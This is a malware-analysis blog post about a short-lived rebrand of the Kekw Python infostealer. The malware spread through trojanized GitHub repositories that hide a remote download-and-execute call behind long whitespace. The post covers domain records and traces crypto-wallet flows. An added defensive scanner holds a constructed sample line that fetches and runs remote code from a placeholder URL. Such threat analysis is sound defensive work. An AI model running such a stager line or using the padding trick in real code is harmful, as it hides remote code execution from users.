A new warrior has entered the ring
Last week, I released my blog “Kekw keeps evolving” detailing how the Kekw malware was being spread via trojanized tools on GitHub where a malicious PyPi package is downloaded and executed to steal all kinds of information from the user running the tool.
While working on that blog, I noticed on 28 May that another GitHub account (Sammy3003) uploaded several new repositories that were identical to the ones analysed previously.
The account was created on 13 March 2021 with no activity until January 2023, when two non-malicious repositories were created. One contained several identical template files for a resume; the other contains the account’s GitHub config file.
With no additional activity until end of May, this GitHub account likely got compromised and is now being used for malicious purposes.
The threat actor uploads 5 repositories:
Except for “Tron-Sweeper”, the other repositories were also present in the GitHub accounts analysed in my previous blog.
The command to download additional malicious code is hidden by moving it out of sight, at least when the text is not wrapped.
- The green rectangle shows only legitimate imports (keep this in mind for later)
- The red rectangle shows the entire horizontal scroll bar
- The blue rectangle shows that the scroll box is very small compared to the scroll bar
What could be the reason for the scroll box being so small?
Going through the code, there is nothing that could explain this behaviour, such as a very long base64-encoded command or code encrypted with Fernet as seen in my previous blog.
Switching to “raw” code mode, no endless scrolling is needed as the malicious code that downloads a second stage becomes visible immediately.
Compare the code that’s in the green rectangle from the screenshot above, with the code that’s shown when in raw mode.
That was pretty easy! It looks like the Python script downloads and executes a script which is retrieved from hxxps://bananasquad[.]ru/paste.
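The padding trick described above (legitimate imports, then hundreds of spaces, then the stager call) is easy to miss by eye but easy to catch mechanically. The following scanner is an added example, not code from the original post or from the malware: it flags any source line that carries code after a long run of horizontal whitespace and marks tails that contain download-and-execute style calls. The sample file content and the URL in it are constructed placeholders.

```python
import re

# Constructed sample mimicking the layout seen in the trojanized repositories:
# ordinary imports, a very long run of spaces, then a download-and-execute call.
# The URL is a placeholder and not the one observed in the blog.
SAMPLE_SOURCE = (
    "import os\n"
    "import sys\n"
    "import requests" + " " * 400
    + ";exec(requests.get('hxxps://example.invalid/paste').text)\n"
    "\n"
    "def main():\n"
    "    print('tool starting')\n"
)

# Calls that, when found in the hidden tail of a line, strongly suggest a stager.
SUSPICIOUS = re.compile(r"\b(exec|eval|__import__|requests\.get|urlopen)\s*\(")


def find_hidden_code(source, min_padding=40):
    """Return (line number, visible prefix, hidden tail, is_suspicious) for every
    line that has code after a run of at least `min_padding` spaces/tabs, i.e.
    code that is only visible after scrolling far to the right."""
    hits = []
    padding = re.compile(r"[ \t]{%d,}" % min_padding)
    for lineno, line in enumerate(source.splitlines(), start=1):
        m = padding.search(line)
        if not m or m.start() == 0:
            continue  # no padding, or it is plain leading indentation
        tail = line[m.end():]
        if not tail.strip():
            continue  # trailing whitespace only, nothing hidden
        prefix = line[:m.start()]
        hits.append((lineno, prefix, tail, bool(SUSPICIOUS.search(tail))))
    return hits


if __name__ == "__main__":
    for lineno, prefix, tail, bad in find_hidden_code(SAMPLE_SOURCE):
        flag = "SUSPICIOUS" if bad else "hidden"
        print(f"line {lineno} [{flag}] visible: {prefix!r} hidden: {tail!r}")
```

Run it over every `.py` file in a repository before executing a downloaded tool; the "raw" view of GitHub shows the same thing, but the scanner does not depend on someone remembering to look.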
Analysing the website with VirusTotal on 28 May, we get a clean sheet.
On Friday 2 June, the URL is already marked by seven vendors as malicious.
Looking up some information about the domain, we find that bananasquad[.]ru was registered only weeks ago. To be precise, two weeks before the repositories were uploaded on the GitHub account of Sammy3003.
Let’s compare the whois records of kekwltd[.]ru and bananasquad[.]ru.
The domain kekwltd[.]ru was used in the malware samples analysed in the previous blog and explains how the malware received its name.
The new domain bananasquad[.]ru is used in this malware sample, and inspired the title of this blog.
Whois record for kekwltd.ru
Whois record for bananasquad.ru
Both domains are registered by a “Private Person”, both using Cloudflare as nameserver, and they’re both registered at the same registrar. R01-RU is the first accredited registrar in the national domain RU, according to their own website and they claim to be one of the leaders in .RU, .SU, and .РФ domains.
Let’s see who you really are
Using urlscan.io, it’s possible to retrieve the script from the bananasquad URL. At first glance, it looks very similar to what we’ve seen before in the “Kekw keeps evolving” blog. If you haven’t read that blog, give it a read to make sure you know what it’s all about.
After looking at it a bit more in-depth, we can see that the code mostly matches the latest version of the PyPi package syssqlitedbpackageV1. However, the last 16 lines of the code from syssqlitedbpackageV1 are not present anymore.
Left side: syssqlitedbpackageV1
Right side: bananasquad[.]ru/paste
The Fernet encrypted command also makes a return in this new version. Due to the length of the command, it was omitted from the code comparison above.
Let’s look at what we can find when we decrypt the Fernet command.
Again, the script we get after decrypting is mostly the same, containing only changes to reflect the new domain as well as new crypto addresses for the crypto replace functionality.
Changes to the code for the new domain and removal of other kekw references in the code:
Changes to the crypto addresses used to replace any crypto addresses copied by the victim:
The threat actor is even too lazy to change the version number:
The account Sammy3003 gets deleted by GitHub within 72 hours after upload of the malicious repositories.
Follow the money
When analysing the crypto addresses for money flowing in or out, there are only a couple of transactions for the Bitcoin and Ethereum addresses. Date last checked: 2 June 2023.
No transactions on Monero, Cardano or Dash.
- 0.8058667 BTC is received on 17 May
- 0.02486524 BTC is sent on 17 May
- 0.02491276 BTC is sent on 17 May
- 0.03009624 BTC is sent on 17 May
- 0.00071243 BTC is sent on 29 May
The transaction on 29 May sticks out, even though it’s the smallest amount. When following that transaction, after several hops, the money is sent to the Bitcoin address 37jAAWEdJ9D9mXybRobcveioxSkt7Lkwog. Through OSINT, we can identify that this wallet belongs to the crypto exchange ChangeNow.io.
- 1.23 ETH is received on 20 May
- 1.23 ETH is sent on 29 May
Again, we see an outgoing transaction on 29 May. Let’s track the transaction to the wallet it’s sent to (0x69b2bba5dc9d0f68ce0ae98395f72cefad7e543a). Five minutes after the money has been transferred, it again gets sent to another wallet. This time it goes to 0x077d360f11d220e4d5d831430c81c26c9be7c4a4. This wallet holds a lot of money and has made many transactions in its lifetime. Using OSINT, we can again link this wallet to the same crypto exchange (ChangeNow.io) as with the Bitcoin money flow.
It looks like the threat actor is using this exchange to gather any stolen currency.
As this GitHub account and the rebranded malware were very short-lived, with fewer GitHub accounts and repositories involved, the amount of stolen cryptocurrency is also far lower than for the Kekw variant.
Based on the analysis made in this blog, I suspect this to be the same threat actor and not a different threat actor using the same malware bought from a Malware-as-a-Service vendor.